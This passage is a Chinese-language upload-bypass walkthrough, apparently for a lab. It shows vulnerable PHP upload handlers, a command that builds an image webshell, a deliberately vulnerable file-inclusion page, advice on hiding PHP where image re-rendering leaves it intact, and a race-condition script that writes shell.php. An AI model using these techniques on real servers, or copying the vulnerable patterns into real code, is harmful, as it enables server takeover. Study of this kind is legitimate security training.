<span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])){</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$res</span> = isImage(<span class="variable">$temp_file</span>);</span><br><span class="line"> <span class="keyword">if</span>(!<span class="variable">$res</span>){</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"文件未知,上传失败!"</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.<span class="variable">$res</span>;</span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file(<span class="variable">$temp_file</span>,<span class="variable">$img_path</span>)){</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>准备一张普通的图片和一句话木马</p>
<p>在命令控制行输入以下命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">copy image.jpg/b+test.php/a test.png</span><br></pre></td></tr></table></figure>
<p>生成的test.png就是我们制作好的图片马,上传即可</p>
<p>利用文件包含执行php代码</p>
<p>include.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">本页面存在文件包含漏洞,用于测试图片马是否能正常运行!</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">header(<span class="string">"Content-Type:text/html;charset=utf-8"</span>);</span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">'file'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$file</span>)){</span><br><span class="line"> <span class="keyword">include</span> <span class="variable">$file</span>;</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"> show_source(<span class="keyword">__file__</span>);</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/include.php?file=upload/xxx.jpg</span><br></pre></td></tr></table></figure>
<h4 id="二次渲染"><a href="#二次渲染" class="headerlink" title="二次渲染"></a>二次渲染</h4><p>这里综合判断了后缀名、content-type,以及利用<code>imagecreatefrompng</code></p>
<p>判断是否为图片,最后再做了一次二次渲染</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])){</span><br><span class="line"> <span class="comment">// 获得上传文件的基本信息,文件名,类型,大小,临时文件路径</span></span><br><span class="line"> <span class="variable">$filename</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>];</span><br><span class="line"> <span class="variable">$filetype</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'type'</span>];</span><br><span class="line"> <span class="variable">$tmpname</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"></span><br><span class="line"> <span class="variable">$target_path</span>=UPLOAD_PATH.<span class="string">'/'</span>.basename(<span class="variable">$filename</span>);</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 获得上传文件的扩展名</span></span><br><span class="line"> <span class="variable">$fileext</span>= substr(strrchr(<span class="variable">$filename</span>,<span class="string">"."</span>),<span class="number">1</span>);</span><br><span class="line"></span><br><span class="line"> <span class="comment">//判断文件后缀与类型,合法才进行上传操作</span></span><br><span class="line"> <span class="keyword">if</span>((<span class="variable">$fileext</span> == <span class="string">"jpg"</span>) && (<span class="variable">$filetype</span>==<span class="string">"image/jpeg"</span>)){</span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file(<span class="variable">$tmpname</span>,<span class="variable">$target_path</span>)){</span><br><span class="line"> <span class="comment">//使用上传的图片生成新的图片</span></span><br><span class="line"> <span class="variable">$im</span> = imagecreatefromjpeg(<span class="variable">$target_path</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$im</span> == <span class="literal">false</span>){</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"该文件不是jpg格式的图片!"</span>;</span><br><span class="line"> @unlink(<span class="variable">$target_path</span>);</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="comment">//给新图片指定文件名</span></span><br><span class="line"> srand(time());</span><br><span class="line"> <span class="variable">$newfilename</span> = strval(rand()).<span class="string">".jpg"</span>;</span><br><span class="line"> <span class="comment">//显示二次渲染后的图片(使用用户上传图片生成的新图片)</span></span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="variable">$newfilename</span>;</span><br><span class="line"> imagejpeg(<span class="variable">$im</span>,<span class="variable">$img_path</span>);</span><br><span class="line"> @unlink(<span class="variable">$target_path</span>);</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> }<span class="keyword">else</span> <span class="keyword">if</span>((<span class="variable">$fileext</span> == <span class="string">"png"</span>) && (<span class="variable">$filetype</span>==<span class="string">"image/png"</span>)){</span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file(<span class="variable">$tmpname</span>,<span class="variable">$target_path</span>)){</span><br><span class="line"> <span class="comment">//使用上传的图片生成新的图片</span></span><br><span class="line"> <span class="variable">$im</span> = imagecreatefrompng(<span class="variable">$target_path</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$im</span> == <span class="literal">false</span>){</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"该文件不是png格式的图片!"</span>;</span><br><span class="line"> @unlink(<span class="variable">$target_path</span>);</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="comment">//给新图片指定文件名</span></span><br><span class="line"> srand(time());</span><br><span class="line"> <span class="variable">$newfilename</span> = strval(rand()).<span class="string">".png"</span>;</span><br><span class="line"> <span class="comment">//显示二次渲染后的图片(使用用户上传图片生成的新图片)</span></span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="variable">$newfilename</span>;</span><br><span class="line"> imagepng(<span class="variable">$im</span>,<span class="variable">$img_path</span>);</span><br><span class="line"></span><br><span class="line"> @unlink(<span class="variable">$target_path</span>);</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>; </span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> }<span class="keyword">else</span> <span class="keyword">if</span>((<span class="variable">$fileext</span> == <span class="string">"gif"</span>) && (<span class="variable">$filetype</span>==<span class="string">"image/gif"</span>)){</span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file(<span class="variable">$tmpname</span>,<span class="variable">$target_path</span>)){</span><br><span class="line"> <span class="comment">//使用上传的图片生成新的图片</span></span><br><span class="line"> <span class="variable">$im</span> = imagecreatefromgif(<span class="variable">$target_path</span>);</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$im</span> == <span class="literal">false</span>){</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"该文件不是gif格式的图片!"</span>;</span><br><span class="line"> @unlink(<span class="variable">$target_path</span>);</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="comment">//给新图片指定文件名</span></span><br><span class="line"> srand(time());</span><br><span class="line"> <span class="variable">$newfilename</span> = strval(rand()).<span class="string">".gif"</span>;</span><br><span class="line"> <span class="comment">//显示二次渲染后的图片(使用用户上传图片生成的新图片)</span></span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="variable">$newfilename</span>;</span><br><span class="line"> imagegif(<span class="variable">$im</span>,<span class="variable">$img_path</span>);</span><br><span class="line"></span><br><span class="line"> @unlink(<span class="variable">$target_path</span>);</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"只允许上传后缀为.jpg|.png|.gif的图片文件!"</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>准备一张图片,上传,再把上传之后的图片再次上传</p>
<p>通过工具对比三种图片的十六进制,我们确定这里对文件头部信息,文件扩展名,<code>content-type</code>对文件类型进行检测</p>
<p>如果该文件在规则设置之内,则通过模块<code>imagecreatefrompng</code>对文件内容进行二次渲染,然后重命名上传</p>
<p>我们通过对比三张图片,可以确定不被渲染的文件头部分和被渲染的主体部分</p>
<p>我们把一句话代码插入到文件头中,这样就不会被渲染掉</p>
<p>这里注意插入代码的位置,如果插入点正好是检测文件类型的那一部分,会导致判断不出文件类型,从而拦截</p>
<p>所以插入点位置尽量靠后,并且在冒号之后</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">比如代码插入到了xxx(代码):xxx</span><br><span class="line">可能会被检测到文件类型异常</span><br><span class="line">需要手动修改为xxx:(代码)xxx</span><br></pre></td></tr></table></figure>
<p>利用文件包含执行php代码</p>
<p>include.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">本页面存在文件包含漏洞,用于测试图片马是否能正常运行!</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">header(<span class="string">"Content-Type:text/html;charset=utf-8"</span>);</span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">'file'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$file</span>)){</span><br><span class="line"> <span class="keyword">include</span> <span class="variable">$file</span>;</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"> show_source(<span class="keyword">__file__</span>);</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/include.php?file=upload/xxx.jpg</span><br></pre></td></tr></table></figure>
<h3 id="代码逻辑"><a href="#代码逻辑" class="headerlink" title="代码逻辑"></a>代码逻辑</h3><h4 id="条件竞争"><a href="#条件竞争" class="headerlink" title="条件竞争"></a>条件竞争</h4><p>条件竞争上传是一种服务器端的漏洞,由于后端程序操作逻辑不合理导致。<br>由于服务器端在处理不同用户的请求时是并发进行的,因此,如果并发处理不当或相关操作逻辑顺序设计的不合理时,将会导致此类问题的发生,此漏洞一般发生在多个线程同时访问同一个共享代码、变量、文件等没有进行锁操作或者同步操作的场景中。</p>
<div class="tabs" id=""><ul class="nav-tabs"><li class="tab active"><button type="button" data-href="#-1">直接保存</button></li><li class="tab"><button type="button" data-href="#-2">白名单检测</button></li></ul><div class="tab-contents"><div class="tab-item-content active" id="-1"><p>文件先通过move_uploaded_file进行保存,然后用in_array判断文件是否为图片类型,如果是就用rename进行重命名,如果不是,则使用unlink删除文件</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])){</span><br><span class="line"> <span class="variable">$ext_arr</span> = <span class="keyword">array</span>(<span class="string">'jpg'</span>,<span class="string">'png'</span>,<span class="string">'gif'</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>];</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$file_ext</span> = substr(<span class="variable">$file_name</span>,strrpos(<span class="variable">$file_name</span>,<span class="string">"."</span>)+<span class="number">1</span>);</span><br><span class="line"> <span class="variable">$upload_file</span> = UPLOAD_PATH . <span class="string">'/'</span> . <span class="variable">$file_name</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file(<span class="variable">$temp_file</span>, <span class="variable">$upload_file</span>)){</span><br><span class="line"> <span class="keyword">if</span>(in_array(<span class="variable">$file_ext</span>,<span class="variable">$ext_arr</span>)){</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH . <span class="string">'/'</span>. rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.<span class="variable">$file_ext</span>;</span><br><span class="line"> rename(<span class="variable">$upload_file</span>, <span class="variable">$img_path</span>);</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"只允许上传.jpg|.png|.gif类型文件!"</span>;</span><br><span class="line"> unlink(<span class="variable">$upload_file</span>);</span><br><span class="line"> }</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>首先上传一个php文件,当然这个文件会被立马删掉,所以我们使用burp suite不断的进行上传操作,总会有一次在上传文件到删除文件这个时间段内访问到上传的php文件,一旦我们成功访问到了上传的文件,那么它就会向服务器写一个shell。</p>
<p>先上传一个正常的图片,判断文件上传的地址</p>
<p>创建一个php文件,写入如下代码,该代码会生成一个包含恶意代码的php文件</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">fputs(fopen(<span class="string">'shell.php'</span>,w),<span class="string">'<?php phpinfo();?>'</span>);</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p>通过burp suite不断进行上传操作,一边不断访问文件上传的地址,因为条件竞争关系,文件可能会在上传之后没有来得及改名</p>
<p>这里可以通过python脚本不断进行访问(也可以手动访问)</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">while</span> <span class="number">1</span>:</span><br><span class="line"> req = requests.get(<span class="string">"文件上传地址"</span>)</span><br><span class="line"> <span class="keyword">if</span> req.status_code==<span class="number">200</span>:</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">"访问成功,"</span>+<span class="string">"响应码:"</span>+<span class="built_in">str</span>(req.status_code))</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">"test~"</span>)</span><br></pre></td></tr></table></figure>
<p>成功的时候,<code>shell.php</code>文件已经被写入,直接访问即可</p>
<p>如果存在文件包含,可以直接上传图片马,再进行文件包含</p>
<p>利用文件包含执行php代码</p>
<p>include.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">本页面存在文件包含漏洞,用于测试图片马是否能正常运行!</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">header(<span class="string">"Content-Type:text/html;charset=utf-8"</span>);</span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">'file'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$file</span>)){</span><br><span class="line"> <span class="keyword">include</span> <span class="variable">$file</span>;</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"> show_source(<span class="keyword">__file__</span>);</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/include.php?file=upload/xxx.jpg</span><br></pre></td></tr></table></figure><button type="button" class="tab-to-top" aria-label="scroll to top"><i class="fas fa-arrow-up"></i></button></div><div class="tab-item-content" id="-2"><p>这里先进行白名单判断,拒绝不在白名单里文件的上传操作,然后会一步一步检查文件大小、文件是否存在等等,将文件上传后,对文件重新命名。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//index.php</span></span><br><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>]))</span><br><span class="line">{</span><br><span class="line"> <span class="keyword">require_once</span>(<span class="string">"./myupload.php"</span>);</span><br><span class="line"> <span class="variable">$imgFileName</span> =time();</span><br><span class="line"> <span class="variable">$u</span> = <span class="keyword">new</span> MyUpload(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>], <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>], <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'size'</span>],<span class="variable">$imgFileName</span>);</span><br><span class="line"> <span class="variable">$status_code</span> = <span class="variable">$u</span>->upload(UPLOAD_PATH);</span><br><span class="line"> <span class="keyword">switch</span> (<span class="variable">$status_code</span>) {</span><br><span class="line"> <span class="keyword">case</span> <span class="number">1</span>:</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> <span class="variable">$img_path</span> = <span class="variable">$u</span>->cls_upload_dir . <span class="variable">$u</span>->cls_file_rename_to;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="number">2</span>:</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'文件已经被上传,但没有重命名。'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> -<span class="number">1</span>:</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'这个文件不能上传到服务器的临时文件存储目录。'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> -<span class="number">2</span>:</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传失败,上传目录不可写。'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> -<span class="number">3</span>:</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传失败,无法上传该类型文件。'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> -<span class="number">4</span>:</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传失败,上传的文件过大。'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> -<span class="number">5</span>:</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传失败,服务器已经存在相同名称文件。'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> -<span class="number">6</span>:</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'文件无法上传,文件不能复制到目标目录。'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">default</span>:</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'未知错误!'</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="comment">//myupload.php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">MyUpload</span></span>{</span><br><span class="line">......</span><br><span class="line">......</span><br><span class="line">...... </span><br><span class="line"> <span class="keyword">var</span> <span class="variable">$cls_arr_ext_accepted</span> = <span class="keyword">array</span>(</span><br><span class="line"> <span class="string">".doc"</span>, <span class="string">".xls"</span>, <span class="string">".txt"</span>, <span class="string">".pdf"</span>, <span class="string">".gif"</span>, <span class="string">".jpg"</span>, <span class="string">".zip"</span>, <span class="string">".rar"</span>, <span class="string">".7z"</span>,<span class="string">".ppt"</span>,</span><br><span class="line"> <span class="string">".html"</span>, <span class="string">".xml"</span>, <span class="string">".tiff"</span>, <span class="string">".jpeg"</span>, <span class="string">".png"</span> );</span><br><span class="line"></span><br><span class="line">......</span><br><span class="line">......</span><br><span class="line">...... </span><br><span class="line"> <span class="comment">/** upload()</span></span><br><span class="line"><span class="comment"> **</span></span><br><span class="line"><span class="comment"> ** Method to upload the file.</span></span><br><span class="line"><span class="comment"> ** This is the only method to call outside the class.</span></span><br><span class="line"><span class="comment"> ** <span class="doctag">@para</span> String name of directory we upload to</span></span><br><span class="line"><span class="comment"> ** <span class="doctag">@returns</span> void</span></span><br><span class="line"><span class="comment"> **/</span></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">upload</span>(<span class="params"> <span class="variable">$dir</span> </span>)</span>{</span><br><span class="line"> </span><br><span class="line"> <span class="variable">$ret</span> = <span class="keyword">$this</span>->isUploadedFile();</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$ret</span> != <span class="number">1</span> ){</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">$this</span>->resultUpload( <span class="variable">$ret</span> );</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="variable">$ret</span> = <span class="keyword">$this</span>->setDir( <span class="variable">$dir</span> );</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$ret</span> != <span class="number">1</span> ){</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">$this</span>->resultUpload( <span class="variable">$ret</span> );</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="variable">$ret</span> = <span class="keyword">$this</span>->checkExtension();</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$ret</span> != <span class="number">1</span> ){</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">$this</span>->resultUpload( <span class="variable">$ret</span> );</span><br><span class="line"> 